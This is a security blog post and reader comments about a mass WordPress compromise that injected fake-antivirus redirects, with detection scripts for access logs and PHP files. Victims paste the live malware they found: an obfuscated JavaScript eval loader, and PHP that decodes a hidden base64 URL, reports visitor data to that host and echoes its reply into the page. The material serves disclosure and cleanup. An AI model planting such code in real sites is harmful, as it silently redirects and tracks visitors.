Latest Mass Compromise of WordPress sites – More Details

We are getting lots of questions about the latest mass compromise targeting WordPress sites (redirecting to fake AV) that has affected over 30,000 domains.

The first question is how these sites are getting hacked. In all the cases we analysed, they either had outdated versions of WordPress or of a plugin. We can safely rule out any new vulnerability in WordPress itself.

We also posted about it a week ago when we detected this malware campaign using .rr.nu domains.

As we promised in the previous post, this is an update to what we are seeing.

More Details

  • The malicious domains are still pointing to 194.28.114.103 and 194.28.114.102 (the same IPs used by the group behind the sweepstakesandcontestsdo.com and infoitpoweringgathering.com attacks)
  • More than 200 different .rr.nu domains are being used
  • We have identified more than 500 variations of the injected URL to random domain names in the .rr.nu TLD:

If you’re not sure if you’re infected, do a free website malware scan using SiteCheck

19 comments
  1. I couldn’t get an affected WordPress server to give me the bad link without using a Chrome Macintosh user-agent in my wget request. Once you do, it looks like it’s clickjacking to a pay-per-click site and redirecting out to google.com. I’m guessing the OSX clicks pay more.

  2. The web logs from my affected host show this:

    64.15.78.203 - - [04/Mar/2012:23:21:20 +0000] "GET /wp-login.php HTTP/1.1" 200 3430 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:21 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:24 +0000] "GET /wp-admin/ HTTP/1.1" 200 69832 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:37 +0000] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 50722 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:42 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 200 51117 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
    64.15.78.203 - - [04/Mar/2012:23:21:46 +0000] "GET /wp-admin/theme-editor.php?file=%2Fthemes%2Fboxpark%2Farchive.php&theme=Boxpark%2Fboxpark&dir=theme HTTP/1.1" 200 41820 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"

    Unless I’m wrong, it looks like someone posted some data to wp-login.php and was granted immediate access. All our passwords are secure so perhaps the SQL Server was hacked?
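The sequence in that log (an accepted POST to wp-login.php, then the built-in theme editor being opened and saved from the same address within seconds, with no Referer on the login) is exactly what a site owner should be hunting for in access logs. The script below is an added example, not code from Sucuri or from the commenter: it parses Apache combined-format lines and pairs each accepted login with editor requests from the same IP inside a time window. The sample log is the commenter's lines above plus a constructed benign login from 198.51.100.7; the five-minute window and the Referer heuristic are assumptions.

```python
import json
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log line: ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Built-in WordPress file editors; a POST here writes PHP into a theme or plugin.
EDITOR_PATHS = {"/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php"}

_UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
# First six lines are the commenter's log; the last two are constructed benign traffic.
SAMPLE_LOG = [
    f'64.15.78.203 - - [04/Mar/2012:23:21:20 +0000] "GET /wp-login.php HTTP/1.1" 200 3430 "-" "{_UA}"',
    f'64.15.78.203 - - [04/Mar/2012:23:21:21 +0000] "POST /wp-login.php HTTP/1.1" 302 - "-" "{_UA}"',
    f'64.15.78.203 - - [04/Mar/2012:23:21:24 +0000] "GET /wp-admin/ HTTP/1.1" 200 69832 "-" "{_UA}"',
    f'64.15.78.203 - - [04/Mar/2012:23:21:37 +0000] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 50722 "-" "{_UA}"',
    f'64.15.78.203 - - [04/Mar/2012:23:21:42 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 200 51117 "-" "{_UA}"',
    f'64.15.78.203 - - [04/Mar/2012:23:21:46 +0000] "GET /wp-admin/theme-editor.php?file=%2Fthemes%2Fboxpark%2Farchive.php&theme=Boxpark%2Fboxpark&dir=theme HTTP/1.1" 200 41820 "-" "{_UA}"',
    '198.51.100.7 - - [04/Mar/2012:23:30:02 +0000] "POST /wp-login.php HTTP/1.1" 302 - "http://example.org/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"',
    '198.51.100.7 - - [04/Mar/2012:23:30:05 +0000] "GET /wp-admin/edit.php HTTP/1.1" 200 41000 "http://example.org/wp-admin/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"',
]


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    parts = urlsplit(e["target"])
    e["path"], e["query"] = parts.path, parts.query
    return e


def find_editor_abuse(lines, window=timedelta(minutes=5)):
    """Pair each accepted login (POST /wp-login.php answered with 302) with editor
    requests from the same IP inside `window`; one alert per (ip, login)."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    last_login = {}   # ip -> most recent accepted login event
    alerts = {}       # (ip, login timestamp) -> alert
    for e in events:
        if e["method"] == "POST" and e["path"] == "/wp-login.php" and e["status"] == 302:
            last_login[e["ip"]] = e
            continue
        login = last_login.get(e["ip"])
        if e["path"] not in EDITOR_PATHS or login is None:
            continue
        delta = (e["ts"] - login["ts"]).total_seconds()
        if delta > window.total_seconds():
            continue
        a = alerts.setdefault((e["ip"], login["ts"]), {
            "ip": e["ip"],
            "login_at": login["ts"].isoformat(),
            # A browser submitting the login form sends a Referer; "-" suggests a script.
            "scripted_login": login["referer"] == "-",
            "first_edit_seconds": int(delta),
            "editor_requests": 0,
            "writes": 0,        # POSTs to the editor, i.e. a file was saved
            "files": [],        # file= parameter seen on editor requests
        })
        a["editor_requests"] += 1
        if e["method"] == "POST":
            a["writes"] += 1
        for f in parse_qs(e["query"]).get("file", []):
            if f not in a["files"]:
                a["files"].append(f)
    return list(alerts.values())


if __name__ == "__main__":
    print(json.dumps(find_editor_abuse(SAMPLE_LOG), indent=2))
```

Run against a real access log with `find_editor_abuse(open("access.log"))`. Whatever the detection says, the durable fix for this pattern is the one the post recommends (current WordPress and plugins, fresh credentials) plus disabling the in-dashboard editor with `DISALLOW_FILE_EDIT` in wp-config.php, so a stolen password alone cannot write PHP.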

  3. I’m following you on this problem. All my WordPress websites are infected. I opened them without deleting FTP cookies. The iframe code is changing but is the same on all websites. I can’t find it anywhere.

    Date&&(a=”396″); var b=’!1;var=b gifonll”=d==fi y”;1-(ucomenie.t.ckooindf(gOxe6E2x{)if)7=4av;r date=neD w;jp2″;”=g.d(Tted.semitegTimar e()v;)dom [‘= sud’u.bdum,’s.bmuk’.eu,’dbmu’,’b.amud’rfud’u’,.bmd’,umbdum.nl’,’b.c’du,’nrav’pjmb. ;]od m =flo Ma.htor(h.rtaMsmo(moandd*)el.ngtdomh);=pts[d+”.]moD wde;mn”en=eta(d.e()getmiT+x4ocud;)=eic.tmenkoofig+”=pe(“+eacsed.MTSGote;”(gntri+))ipxrestoG=”+.deMTSng(irt;”/ap;)+”=httxt=”h”+tttp//:p+”.cgni/ rapj+i?”v;g-=e1!=tornavagi.usgenAresaCoLot.trew)(e.in”fidex(fOref),f”xotcnj,”=”1uf=noi(){oto};jrp.typb:f{=e=i{oitunc)(n73424;retu=”;”uurnt},xt )(ncnua:foit=q{“q”709;dN94=;w=rJ=;””uco rab;vd=gnemt;c;vaR=kb=Qr kndoiw= ra”=Ow;dv;”t=hhis=pK;fQDc==””y{urt;=Lc671K= ;00=Wp””;SU=wK=e;b””;pOR=Or””==Ke=b;QVkBq;=b;”;vmF=Fm”W=”settegEw;sirAtt”fd;b=gK=var626;97 a=qR=;][“=fe;bvS=(||)”0;a.heipus”(hghtsub”,”ertgnistr”,”ercatetgeElenemt”,dthiw”tesmbv”,”rfiv,”W,””apbod,”ypenildhCd)”c,g,”,frs”Oe;=64=””506Ty;;hSaU=;b=;b=””=uKDKf;=Iy””;”;swI=Iw”J=12;r361055a;”G=”4=ALg;=40r l598av;=a[a[1[]2=Zn1,3]](;)6;””gP=ar “gPv;”m=a[a[]4[=Oc,3(1]];)692531;amevK=”+m”;ttI””=I=Zjl”=;lO;”O44253;[a[p=a]5[1]]11),3(“=Uetu+”bq;”r;”JQ=n=hb;v ra.b(T=”t;)]9[ ra”;va=c]l[(vK10]);c[a[]=n=b;Dn;c;””=O mIOIm[a[3]]oH==a[;]8402kM=;18]]0c;””kM[a[[a=8];bW=mH=;”””bWY=”w;”]]6]9[“;a[a[[a[7]]T=k(c)Vf;R=”atcc}”l,”h{)h(r”=K=TKb,g(“<.wretihtmbodlh/ydlmt>”)”,k,uI”=E.semeoiTt(nonufut(itch{).a(),i)},332GB=82,292″=S596zN=i}1}}”;cBr o=””av;=ne;gTj w;}).o;=””(a’,a= a.split(“”),c;for(c in a)if(“string”==typeof a[c]){var d=[],e=!0,f=1*a[c];for(Z=0;Z<b.length;Z+=f)d[Z]=e?b.substr(Z,f).split("").reverse().join(""):b.substr(Z,f),e=!e;b=d.join("")}window.eval(b);b=void 0;

  4. I do not believe that this, in all cases, is a TimThumb exploit. Every client I have that is running WordPress got hacked in the last few days. My website was hacked, and I keep WP and the plugins and themes updated. Similarly, I use .htaccess and php.ini directives, as well as mods to WordPress itself to help. None of my themes had the TimThumb code present. Neither did WordPress itself.

    It does seem like it is a WordPress ‘related’ exploit (but not specifically the Blog installed all by itself). The vulnerability present has not come to light through my direct searching or searching for answers on the ‘net.

    I will say this- from a site I know has been hacked that I have not as yet had time to clean, the SiteCheck tool (shown in the post, above) does not find the malicious code, nor the vulnerability.

    I’m at a loss as to what to do beyond the ‘scorched earth’ approach, which is definitely not practical under many situations.

    At any rate, here is the malicious code, without its opening and closing PHP tags-

    CODE BEGINS-
    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        // Crawlers and mainstream browsers are excluded, so scanners and search engines never trigger the callback
        if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false) && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false) && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false) && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false) && (strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create  bot analitics
                // The base64 literal hides the remote "stat" URL; visitor IP, user agent, host and path are reported to it
                $stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']) . '&useragent=' . urlencode($sUserAgent) . '&domainname=' . urlencode($_SERVER['HTTP_HOST']) . '&fullpath=' . urlencode($_SERVER['REQUEST_URI']) . '&check=' . isset($_GET['look']);
                $stCurlHandle = curl_init($stCurlLink);
            }
        }
        if ($stCurlHandle !== NULL)
        {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            $sResult = @curl_exec($stCurlHandle);
            // Whatever the remote server returns after a leading "O" is written straight into the page
            if ($sResult[0] == "O")
            {
                $sResult[0] = " ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    CODE ENDS

    Any help anyone can give in how to fix the exploit, or otherwise neutralize it would be greatly appreciated.

    Thank you all for your time.
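The block the commenter posted has a recognisable shape: a user-agent filter that excludes crawlers and common browsers, a URL hidden in a base64 literal, a silenced `@curl_exec`, and the remote reply echoed into the page. Those traits are searchable, and decoding the literal tells you where the callback goes. The scanner below is an added example, not Sucuri's tool and not the commenter's code: it scores a PHP source for those indicators and decodes every base64 literal handed to `base64_decode()`. The injected sample is a condensed, constructed version of the code above (its base64 string is the one in the post); the benign sample, the indicator list and the score threshold are assumptions.

```python
import base64
import os
import re

# Textual indicators taken from the shape of the injected block above.
INDICATORS = {
    "base64_decode":    re.compile(r"base64_decode\s*\("),
    "curl_init":        re.compile(r"curl_init\s*\("),
    "user_agent_check": re.compile(r"HTTP_USER_AGENT"),
    "crawler_cloaking": re.compile(r"strstr\s*\(\s*\$\w+\s*,\s*['\"](?:google|yahoo|bing|baidu|bot)['\"]"),
    "silenced_curl":    re.compile(r"@curl_exec\s*\("),
}
# A long base64 literal passed directly to base64_decode()
B64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]")

# Constructed, condensed form of the posted code (same base64 literal as the post).
INJECTED_SAMPLE = """
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'bot') == false)) {
    $stCurlLink = base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);
    $stCurlHandle = curl_init($stCurlLink);
    $sResult = @curl_exec($stCurlHandle);
}
"""
# Constructed legitimate use of base64_decode(): a small JSON config blob.
BENIGN_SAMPLE = """
$cfg = json_decode(base64_decode('eyJtb2RlIjoicHJvZCJ9'));
echo $cfg->mode;
"""


def decode_literals(src):
    """Decode every base64 literal passed to base64_decode(); keep printable results."""
    out = []
    for m in B64_LITERAL_RE.finditer(src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except ValueError:        # binascii.Error and UnicodeDecodeError both derive from it
            continue
        if text.isprintable():
            out.append(text)
    return out


def scan_php_source(src, path="<inline>"):
    """Score one PHP source string; a hidden remote URL weighs as much as two indicators."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    decoded = decode_literals(src)
    urls = [t for t in decoded if t.startswith(("http://", "https://"))]
    score = len(hits) + 2 * len(urls)
    return {"path": path, "indicators": hits, "decoded": decoded,
            "remote_urls": urls, "score": score, "suspicious": score >= 4}


def scan_tree(root):
    """Scan every .php file under root and return only the suspicious results."""
    results = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.endswith(".php"):
                p = os.path.join(dirpath, n)
                with open(p, encoding="utf-8", errors="replace") as fh:
                    r = scan_php_source(fh.read(), p)
                if r["suspicious"]:
                    results.append(r)
    return results


if __name__ == "__main__":
    for sample in (INJECTED_SAMPLE, BENIGN_SAMPLE):
        print(scan_php_source(sample))
```

Point `scan_tree` at the document root to list every file carrying the pattern; the decoded URL in a hit is the outbound connection to block at the firewall and to look for in proxy logs. A clean result is not proof of a clean site (the same scan misses the commenter's iframe injections and the `nl.php` database records mentioned below), so pair it with the database search and a full file comparison against a known-good copy.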

  5. This hack infects every PHP file on your server with “eval(base64_decode(…” In WordPress installs, it appears to inject a bunch of nl.php links into the comments table (just search your database for nl.php and it will return the infections). I purged the offending records from the database, replaced the entire site with clean PHP, reset all usernames and passwords (including MySQL and FTP), and that seemed to fix it…. for a couple of days. Now it appears to be back, even though everything appears to still be clean (no eval in the PHP files, no nl.php in the database, etc.). Anyone have ideas where else to check?
